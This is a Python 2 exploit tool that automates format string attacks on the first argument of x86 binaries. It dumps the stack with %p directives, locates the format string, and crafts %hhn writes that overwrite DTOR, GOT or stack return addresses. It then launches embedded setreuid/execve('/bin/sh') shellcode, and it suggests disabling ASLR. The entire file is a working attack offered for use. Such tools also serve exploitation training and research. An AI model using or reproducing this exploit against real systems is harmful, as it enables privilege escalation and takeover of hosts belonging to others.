#!/usr/bin/env python
# Created by Paul Haas
# Licensed under the GPLv3
'''Attempt automatic format string exploitation on argv1 of x86 binaries.

It is possible to use format string attacks to gain information about the stack
of the running binary. With this information, we can locate addressable
locations on the stack, including our shellcode location as well as return
values and other potential exploit locations.

In order to customize the attack for other binaries, both the execute_binary
and execute_shellcode functions need to be modified to push the format string
in the correct location, and return the output in the right format.
'''
# NOTE: this script treats str as a byte string (struct.pack() output is
# concatenated directly with str literals), i.e. it is written for Python 2.

import sys
import os
import re
import string
import struct
import logging
from operator import itemgetter
from subprocess import Popen,PIPE,call
from optparse import OptionParser, OptionGroup, IndentedHelpFormatter

import platform

log = logging.getLogger("fmt_exp")
log.setLevel(logging.WARNING)
ch = logging.StreamHandler()
formatter = logging.Formatter("%(filename)s:%(lineno)d: %(message)s")
ch.setFormatter(formatter)
log.addHandler(ch)

# These are global because they are used just about everywhere
OVERWRITE_STRING = "AAAABBBBCCCCDDDD" # 16
WRITE_FORMAT = '''%003c%03i$hhn%003c%03i$hhn%003c%03i$hhn%003c%03i$hhn''' # 52
#SHELLCODE = "\x31\xdb\x8d\x43\x17\x99\xcd\x80\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x8d\x41\x0b\x89\xe3\xcd\x80" # exec '/bin/sh'
SHELLCODE = "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"# setreuid(geteuid(),geteuid());execve("/bin/sh",0,0);
NOP = '\x90'


def execute_binary(binary, format):
    '''Return the output from our format string argument passed to the binary.

    The return value should be a string representing the result of the format
    string attack without any other characters or parsing, and may need to be
    customized for unusual binaries.

    binary -- path of the program to run
    format -- format string handed to the program as its only argument
    Returns the program's stdout with surrounding whitespace stripped.
    '''
    process = Popen([binary, format],stdout=PIPE,close_fds=True)
    return process.communicate()[0].strip()


def execute_shellcode(binary, format):
    '''Similar to execute_binary, except this call passes control to it.

    The child inherits our stdio (nothing is captured) and nothing is returned.
    '''
    call([binary,format])


def process_arguments():
    '''Parse the command line and derive the overwrite address.

    Updates the module globals SHELLCODE and OVERWRITE_STRING according to the
    chosen options, and adjusts the logger level from -v/-q.
    Returns a (binary, options) tuple; exits through parser.error() on misuse.
    '''
    usage = """Usage: %prog [options] binary
Attempt automatic format string exploitation on the provided binary. Default
action is to insert setreuid(geteuid(),geteuid()); execve('/bin/sh',0,0)
shellcode at the end of the format string, and overwrite the DTOR address of
the binary to return to it."""
    global SHELLCODE, OVERWRITE_STRING
    help_formatter = IndentedHelpFormatter(indent_increment=1, max_help_position=120, width=120, short_first=1)
    parser = OptionParser(usage=usage,formatter=help_formatter)
    # Testing methods: number of %p's, splitter, replacer, DUMMY
    # Verbose Methods -v -d , show shellcode, etc
    # Execute Methods: Control how binary is called and how it takes format string
    # Attack methods: Manual exploitation, or provide a print like statement
    # Include a generate vulnerable binary function?
    parser.add_option('-v', '--verbose', dest='verbose', action='count',
                      help="Increase verbosity (specify multiple times for more) default is %default",default=2)
    parser.add_option('-q', '--quiet', dest='quiet', action='count',
                      help="Decrease verbosity (specify multiple times for more)",default=0)

    overwrite_group = OptionGroup(parser, "Overwrite options","Arguments to determine location to overwrite in binary")
    overwrite_group.add_option("-d", "--dtor", action="store_true", dest="dtor",
                               help="overwrite dtor address (%default)",default=True)
    overwrite_group.add_option("-g", "--got", type="string", dest="got",
                               help="Overwrite GOT function (ie: exit)", metavar="function", default=False)
    #overwrite_group.add_option("-c", "--code", type="int", dest="code", help="Overwrite nth given code segment return address found on stack")
    overwrite_group.add_option("-c", "--code", action="store_true", dest="code",
                               help="Overwrite first code segment return address found on stack")
    overwrite_group.add_option("-a", "--address", type="int", dest="overwrite",
                               help="Custom overwrite address", metavar="0x12345678", default=False)
    parser.add_option_group(overwrite_group)

    exploit_group = OptionGroup(parser, "Exploit options","Arguments that control the how and where of our shellcode")
    exploit_group.add_option("-s", "--string", action="store_true", dest="stringsploit",
                             help="Insert shellcode within format string (%default)",default=True)
    exploit_group.add_option("-S", "--Shellcode", type="string", dest="shellcode",
                             help="Insert Custom shellcode in format string (ie: setuid(0); exec '/bin/sh')", metavar="shellcode")
    exploit_group.add_option("-E", "--Environ", action="store_true", dest="penv",
                             help="Put shellcode into environment and use it")
    exploit_group.add_option("-e", "--environ", type="string", dest="env",
                             help="Use address of given environment variable", metavar="name")
    exploit_group.add_option("-b", "--bytes", type="string", dest="findbytes",
                             help="Find byte string on stack and point to it", metavar="90909090")
    exploit_group.add_option("-r", "--return", type="int", dest="returnaddr",
                             help="Custom shellcode address", metavar="0x12345678")
    exploit_group.add_option("-o", "--offset", type="int", dest="offset",
                             help="Custom stack offset to format string", metavar="123")
    parser.add_option_group(exploit_group)

    (options, args) = parser.parse_args()
    if len(args) != 1:
        parser.error("incorrect number of arguments")
    binary = args[0]

    # Each -v lowers the logger threshold by one level, each -q raises it
    options.verbose -= options.quiet
    if options.verbose > 4:
        options.verbose = 4
    log.setLevel(logging.CRITICAL - options.verbose*10)

    if options.shellcode:
        SHELLCODE = options.shellcode
        log.info("Replacing exploit with custom shellcode of length %i: %s" % (len(SHELLCODE),repr(SHELLCODE)))

    if options.penv:
        if options.env:
            log.debug("Placing shellcode in '%s' env variable" % options.env)
            os.putenv(options.env,SHELLCODE)
        else:
            log.debug("Placing shellcode in 'SHELLCODE' environment variable")
            os.putenv('SHELLCODE',SHELLCODE)
            options.env = 'SHELLCODE'
    # The variable is later searched for as "NAME=" inside the stack strings
    if options.env and '=' not in options.env:
        options.env += '='

    if (bool(options.overwrite) + bool(options.got) + bool(options.code is not None)) > 1:
        parser.error("can only use a single overwrite address")
    elif options.overwrite or options.got or options.code is not None:
        options.dtor = False

    if options.dtor:
        p1 = Popen(["objdump", "-s", "-j",".dtors", binary], stdout=PIPE)
        p2 = Popen(["tail", "-n1"], stdin=p1.stdout, stdout=PIPE)
        p3 = Popen(["cut", "-d ", "-f2"], stdin=p2.stdout, stdout=PIPE)
        options.overwrite = int(p3.communicate()[0],16)+4
        log.debug("Found DTOR address for binary '%s' at: %#x" % (binary,options.overwrite))
    elif options.got:
        p1 = Popen(["objdump", "--dynamic-reloc", binary], stdout=PIPE)
        p2 = Popen(["grep", " %s$" % options.got], stdin=p1.stdout, stdout=PIPE) # Exact match RE
        p3 = Popen(["cut", "-d ", "-f1"], stdin=p2.stdout, stdout=PIPE)
        options.overwrite = int(p3.communicate()[0],16)
        log.debug("Found got address for function '%s' of binary '%s' at: %#x" % (options.got,binary,options.overwrite))
    elif options.code is not None:
        log.info("Overwrite address will be found on stack")
        options.overwrite = 0x00000000 # We will search for it later

    if options.overwrite:
        #log.debug("Using custom overwrite address for '%s': %#x" % (binary,options.overwrite))
        log.info("Overwrite address starts at: %#8x" % options.overwrite)

    if options.returnaddr or options.env or options.findbytes:
        # They have chosen their own shellcode location, so remove the default
        SHELLCODE = ''
        options.stringsploit = False

    #log.info("Overwrite address starts at: %#8x" % options.overwrite)
    OVERWRITE_STRING = overwrite_address2string(options.overwrite)
    return binary, options


def overwrite_address2string(address):
    '''Represent a 4-byte address as a string of each sub address in it.

    The result is the packed forms of address+0 .. address+3 concatenated, one
    target per byte that the exploit writes.
    '''
    r1 = struct.pack('L',address+0)
    r2 = struct.pack('L',address+1)
    r3 = struct.pack('L',address+2)
    r4 = struct.pack('L',address+3)
    address_string = "%s%s%s%s" % (r1,r2,r3,r4)
    return address_string


def get_stack_dump_format(pnum=504, DUMMY = NOP):
    '''Build the "%p..." stack dump format string.

    Align the length of our stack dump format string to a modulus 16 equivalent
    length of our exploit format string. This saves some effort later on in
    locating our stack offset and string offset to our exploit format string.

    pnum  -- baseline number of "%p" directives
    DUMMY -- filler appended to the global SHELLCODE to make the exploit length even
    Returns the dump format string; exits if the lengths cannot be matched.
    '''
    global OVERWRITE_STRING, WRITE_FORMAT, SHELLCODE
    modulus_match = len(OVERWRITE_STRING + WRITE_FORMAT + SHELLCODE) % 16
    # Make sure our exploit format is of even length to match even stack format
    if modulus_match % 2 == 1:
        SHELLCODE += DUMMY
        modulus_match = len(OVERWRITE_STRING + WRITE_FORMAT + SHELLCODE) % 16

    stack_dump_format = "%p" * pnum
    format_match = len(stack_dump_format) % 16
    if format_match != modulus_match:
        if modulus_match > format_match:
            modulus_match += 16
        # Both lengths are even here, so the floor division is exact
        stack_dump_format = "%p" * (pnum + ((modulus_match - format_match) // 2))
        format_match = len(stack_dump_format) % 16
        modulus_match %= 16

    if format_match != modulus_match:
        log.critical("Modulus of our stack dump format string does not match our potential exploit format string: %i vs %i" % (format_match, modulus_match))
        sys.exit(1)
    return stack_dump_format


def dump_stack(binary,format):
    '''Convert our %p format parameter output to a well formed list of longs.

    Exits if the number of parsed values differs from the number of "%p"
    directives (len(format) // 2).
    '''
    output = execute_binary(binary,format)
    stack = [int(x,16) for x in output.replace('(nil)','0x0').split('0x') if x]
    expected = len(format) // 2
    if len(stack) != expected:
        log.critical("Error matching stack length to our provided dump format: %i vs %i" % (len(stack),expected))
        sys.exit(1)
    log.debug("Stack: [%s]" % ", ".join("%#08x" % s for s in stack))
    return stack


def tedious_dump_stack(binary,format="%p"*504):
    '''Dump the stack one offset per execution of the binary.

    Assuming we have a small buffer and cannot fit our long stack dump format
    string, we can still perform an equivalent stack dump by calling the binary
    multiple times with a format string for each stack offset. This permits a
    smaller buffer at the trade off of requiring multiple calls of the binary.

    Returns (stack, new_format), where new_format is the per-offset format
    string as it was found on the dumped stack.
    '''
    global OVERWRITE_STRING, WRITE_FORMAT, SHELLCODE
    modulus_match = len(OVERWRITE_STRING + WRITE_FORMAT + SHELLCODE) % 16
    format_match = len('%000$x') % 16
    pad = ''
    if format_match != modulus_match:
        if format_match > modulus_match:
            modulus_match += 16
        pad = ' ' * (modulus_match - format_match)
        format_match = len('%000$x'+pad) % 16
        modulus_match %= 16
    log.info("matched stack dump and exploit modulus: %i vs %i" % (format_match,modulus_match))

    # This line does all the tedium of running the binary multiple times and converting the output
    stack = [int(execute_binary(binary,"%%%03i$x%s" % (o,pad)),16) for o in range(1,len(format)//4+1)]

    # Use a RE to find our offset getter on the stack
    # We should also return the format_stack_offset, format_string_adjust
    match = re.search(r'%%\d{3}\$x%s' % pad,stack_to_string(stack))
    if not match:
        log.critical("RE did not find our format string stack offset string")
        sys.exit(1)
    new_format = match.group()
    return stack, new_format


def stack_to_string(stack):
    '''Convert a given list of long addresses into a single string'''
    return ''.join([struct.pack('L',s) for s in stack])


def get_strings(characters,length=4):
    '''Get list of printable strings of given length that are NULL terminated.

    Non-printable characters other than NUL are dropped before splitting on
    NUL; only pieces of at least `length` characters are returned.
    '''
    keep = string.printable+'\x00'
    printables = ''.join([c for c in characters if c in keep])
    return [s for s in printables.split('\x00') if len(s) >= length]


def get_tedious_string_location(binary, stack, format_length, bottomstack = 0xbff00000, topstack = 0xc0000000):
    '''Locate the format string by dumping one stack pointer per execution.

    Similar to tedious_dump_stack, this calls the binary separately for each
    addressable location we discover on the stack from our previous format
    string attack. This is a much slower approach, but sidesteps the parsing
    requirements of our efficient string_location function.

    Returns (format_string_offset, format_string_address, stack_string_structure)
    where the structure is a list of (offset, address, string) tuples.
    '''
    stack_pointers = [(i+1,s) for i,s in enumerate(stack) if bottomstack < s < topstack]
    splitted_strings = [execute_binary(binary, "%%%03i$s" % o) for o,p in stack_pointers]

    # Find our format string in a list of strings
    candidates = [s for s in splitted_strings if re.match(r'%\d{3}\$s',s)]
    if not candidates:
        log.critical("RE did not find our format string among the strings on the stack")
        sys.exit(1)
    format = candidates[0]
    format_string_offset, format_string_address = stack_pointers[splitted_strings.index(format)]
    format_string_offset -= 1

    stack_string_structure = [(offset, address, text)
                              for (offset, address), text in zip(stack_pointers, splitted_strings)]
    return format_string_offset, format_string_address, stack_string_structure

################################################################################

def get_string_location(binary, stack, format_length, bottomstack = 0xbff00000, topstack = 0xc0000000, splitter = '||' ,replacer = '::'):
    '''Locate the format string (and other strings) on the stack in one run.

    From our previous format string attack, we effectively dump each value on
    the stack as an address. We can determine which of these addresses are
    valid pointers to other data on the stack, and attempt a second format
    attack in order to dump these addresses as strings. This allows us to
    locate our format string address on the stack, in addition to environment
    variables and other readable strings.

    splitter -- separator emitted after every dumped string
    replacer -- stand-in for the splitter inside our own format string while
                the output is being split
    Returns (format_string_offset, format_string_address, stack_string_structure)
    where the structure is a list of (offset, address, string) tuples.
    '''
    stack_pointers = [(i+1,s) for i,s in enumerate(stack) if bottomstack < s < topstack]
    format = ''.join(["%%%i$s%s" % (o,splitter) for o,a in stack_pointers])
    stack_strings = execute_binary(binary, format)
    if not stack_strings:
        log.critical("Something went wrong obtaining strings on the stack, try changing offsets %#8x < stack < %#8x" % (bottomstack,topstack))
        sys.exit(1)

    # Identify the location of our format string
    start = stack_strings.index(format)
    end = start + len(format)
    # Insert a new format string with the splitter character replaced, and then split up the strings
    masked_format = format.replace(splitter,replacer)
    splitted_strings = (stack_strings[0:start] + masked_format + stack_strings[end:]).split(splitter)[:-1]
    # Replace our original format string at the correct location in the splitted string list
    splitted_strings[splitted_strings.index(masked_format)] = format

    if len(stack_pointers) != len(splitted_strings):
        log.critical("Number of stack pointer addresses does not match number of strings resolved on stack: %i vs %i" % (len(stack_pointers),len(splitted_strings)))
        log.critical("Consider adjusting splitter and replacer sequences to be unique in the stack: '%s' '%s'" % (splitter,replacer))
        sys.exit(1)

    format_string_offset, format_string_address = stack_pointers[splitted_strings.index(format)]
    format_string_offset -= 1

    # String structure will be useful for finding bytes or other information on the stack
    stack_string_structure = [(offset, address, text)
                              for (offset, address), text in zip(stack_pointers, splitted_strings)]
    return format_string_offset, format_string_address, stack_string_structure


def adjust_address_to_exploit(format_string_address,stack_structure,format_length,format_string_adjust):
    '''Translate addresses observed during the dump to the exploit run.

    Our information format strings are at a slightly different offset than our
    exploit format string. This function aligns the second address from the
    first.

    Returns (format_return_address, adjusted_structure): the address of the
    shellcode inside the exploit string, and a copy of stack_structure in which
    every entry at or below format_string_address is shifted by the length
    difference between the dump format and the exploit format.
    '''
    global OVERWRITE_STRING, WRITE_FORMAT, SHELLCODE
    exploit_length = len(OVERWRITE_STRING+WRITE_FORMAT+SHELLCODE)
    format_return_address = (format_string_address + format_length) - (len(SHELLCODE) + format_string_adjust)
    log.debug("Our exploit string is located at: %#8x" % ((format_string_address + format_length) - (exploit_length + format_string_adjust)))

    adjusted_structure = []
    for offset,address,text in stack_structure:
        if address <= format_string_address:
            address += format_length - (exploit_length + format_string_adjust)
        adjusted_structure.append((offset,address,text))
    return format_return_address, adjusted_structure


# ps -ef | grep "^`id -nu`" | tr -s ' ' | cut -d' ' -f2 | xargs -I{} head -n2 /proc/{}/maps 2>/dev/null
def find_data_return_address(stack,bottomdata = 0x08048000, topdata = 0x08100000): # 0x09000000
    '''Return addresses that correspond roughly to the data section of the binary.

    The result is a list of (offset, value) tuples with 1-based stack offsets,
    for every value strictly between bottomdata and topdata.
    '''
    data_pointers = [(i+1,s) for i,s in enumerate(stack) if bottomdata < s < topdata]
    return data_pointers


def find_string_address(binary,stack,format,options):
    '''Given a binary, a list of values on the stack, and a format string used
    to derive that stack, find the stack offset and address of the format string.

    May update options.overwrite and the global OVERWRITE_STRING (with --code).
    Returns (return_address, format_stack_offset, format_string_adjust).
    '''
    global OVERWRITE_STRING, WRITE_FORMAT, SHELLCODE
    format_length = len(format)
    stack2string = stack_to_string(stack)
    if format not in stack2string:
        # The dump format itself is full of '%' directives, so it must be
        # passed as an argument and never as the logging template.
        log.info("%s %s", format, repr(stack2string))
        log.critical("Non-constant stack? Try:\n\tsudo sysctl -w kernel.randomize_va_space=0")
        sys.exit(1)

    # %0$x is not valid, the first pointer we access is %1$x, hence we start from 1, not 0
    format_index = stack2string.index(format)
    format_stack_offset = format_index // 4 + 1
    format_string_adjust = format_index % 4

    # Handle command line options here, there may be a better location for this
    format_string_offset, format_string_address, stack_structure = get_string_location(binary, stack, format_length)
    #format_string_offset, format_string_address, stack_structure = get_tedious_string_location(binary, stack, format_length)
    format_return_address, stack_structure = adjust_address_to_exploit(format_string_address,stack_structure,format_length,format_string_adjust)

    return_address = None
    if options.code is not None:
        data_pointers = find_data_return_address(stack)
        if not data_pointers:
            log.critical("Could not find a code segment return address on the stack")
            sys.exit(1)
        #data_return_offset, data_return_location = data_pointers[options.code]
        data_return_offset, data_return_location = data_pointers[0]
        #log.debug(["%i: 0x%08x" % (o,a) for o,a in data_pointers])
        exploit_format_string_address = (format_string_address + format_length) - (len(OVERWRITE_STRING+WRITE_FORMAT+SHELLCODE) + format_string_adjust)
        data_ptr_stack_address = exploit_format_string_address - (4 * format_stack_offset) + (4 * data_return_offset)
        log.info("Overwriting data segment return address %#x found in stack at offset %i address %#x" % (data_return_location,data_return_offset,data_ptr_stack_address))
        options.overwrite = data_ptr_stack_address
        OVERWRITE_STRING = overwrite_address2string(options.overwrite)

    if options.stringsploit:
        return_address = format_return_address
    elif options.env:
        for offset,address,text in stack_structure:
            if options.env in text:
                return_address = address + len(options.env)
                break
        if not return_address:
            log.critical("Could not find environment variable '%s' in stack" % options.env)
            sys.exit(1)
    elif options.findbytes:
        for offset,address,text in stack_structure:
            if options.findbytes in text:
                return_address = address + text.index(options.findbytes)
                log.debug("Found bytes at address %#x in string %s at offset %i, so return address is %#x" % (address,repr(text),text.index(options.findbytes),return_address))
                break
        if not return_address:
            log.critical("Could not find provided bytes '%s' in stack" % repr(options.findbytes))
            sys.exit(1)

    # Explicit command line values win over everything discovered above
    if options.offset:
        format_stack_offset = options.offset
    if options.returnaddr:
        return_address = options.returnaddr

    log.info("Overwrite: %#8x return: %#8x, stack offset: %i, string adjust: %i" % (options.overwrite,return_address,format_stack_offset,format_string_adjust))
    return return_address, format_stack_offset, format_string_adjust


def write_address(address,difference=16):
    '''Convert the chosen address into a sorted list of values to write with %n.

    Each of the four bytes of address is paired with its index ('0' is the
    least significant byte). A byte smaller than `difference` is bumped by
    0x100 so that it can still be reached by printing more characters.
    Returns a list of (index, value) tuples ordered by ascending value.
    '''
    values = []
    for index in range(4):
        value = int((address >> (8 * index)) & 0xFF)
        if value < difference:
            value += 0x100
        values.append((str(index), value))
    # sorted() is stable, so equal byte values keep their index order
    return sorted(values, key=itemgetter(1))


def perform_exploit(return_address, stack_offset, string_adjust, DUMMY = NOP):
    '''Build the exploit format string that writes return_address.

    Format strings have a bunch of circular dependencies in their format. Here,
    we approximate on what we know is expected.

    return_address -- value to store at the addresses held in OVERWRITE_STRING
    stack_offset   -- stack offset of the first address in OVERWRITE_STRING
    string_adjust  -- number of DUMMY bytes appended for alignment
    Returns the exploit string; exits if it would contain a NULL byte.
    '''
    global OVERWRITE_STRING, WRITE_FORMAT, SHELLCODE
    difference = len(OVERWRITE_STRING) # 16
    adjust = DUMMY * string_adjust
    write_format = write_address(return_address,difference)

    # Rewrite this loop to be more friendly
    write = ''
    for num,required in write_format:
        if required-difference != 0:
            write += "%%%03ic%%%03i$hhn" % (required-difference,stack_offset+int(num))
        else:
            # Match case where 2 bytes are same value in format
            write += "%%%03i$hhn" % (stack_offset+int(num))
            # Keep the total length constant: the omitted "%NNNc" is 5 characters
            adjust += DUMMY * 5
        difference = required

    format = OVERWRITE_STRING + write + SHELLCODE + adjust
    if '\x00' in format:
        log.critical("NULL BYTE found in format at index %i, please try another exploit method" % format.index('\x00'))
        sys.exit(1)
    log.debug("Created exploit is of length: %i (modulus 16: %i), string adjust is %i" % (len(format), len(format) % 16, string_adjust))
    return format


def verify_exploit(binary, format, options, return_address, stack_offset, string_adjust):
    '''Check to see if the correct overwrite addresses would be overwritten.

    For some unknown reason, even after modulus matching, our offsets are still
    off by +4. If we could address this issue, we could skip this function and
    skip an extra execution of the binary.

    The exploit is run with every "$hhn" replaced by "$p||" so that the write
    targets are printed rather than written. If none of the four expected
    addresses shows up, the exploit is rebuilt with stack_offset+4.
    Returns the (possibly rebuilt) exploit format string.
    '''
    out = execute_binary(binary, format.replace("$hhn","$p||"))
    overwrite_addresses = [int(a[:a.index('||')],16) for a in out.replace('(nil)','0x0').split('0x') if '||' in a]
    if not any(options.overwrite+i in overwrite_addresses for i in range(4)):
        log.debug("Our overwrite addresses starting from %#8x are not in our exploit overwrites: %s" % (options.overwrite, ", ".join(["0x%08x" % a for a in overwrite_addresses])))
        log.warning("Adjusting our stack offset from %i to %i due to unknown stack alignment issue" % (stack_offset,stack_offset+4))
        format = perform_exploit(return_address, stack_offset+4, string_adjust)
    return format


def _require_i686():
    '''Refuse to run on anything but an i686 host.'''
    if platform.machine() != 'i686':
        raise Exception("i686 only, x86_64 is not supported")


def main():
    '''Modular execution of a complete format string attack'''
    # Checked here rather than at import time so the helpers stay importable
    _require_i686()
    binary, options = process_arguments()
    format = get_stack_dump_format()
    stack = dump_stack(binary,format)
    #stack, format = tedious_dump_stack(binary,format)
    return_address, stack_offset, string_adjust = find_string_address(binary,stack,format,options)
    format = perform_exploit(return_address, stack_offset, string_adjust)
    format = verify_exploit(binary, format, options, return_address, stack_offset, string_adjust)
    log.debug("Launching Exploit, Good Luck!")
    execute_shellcode(binary, format)


if __name__ == '__main__':
    main()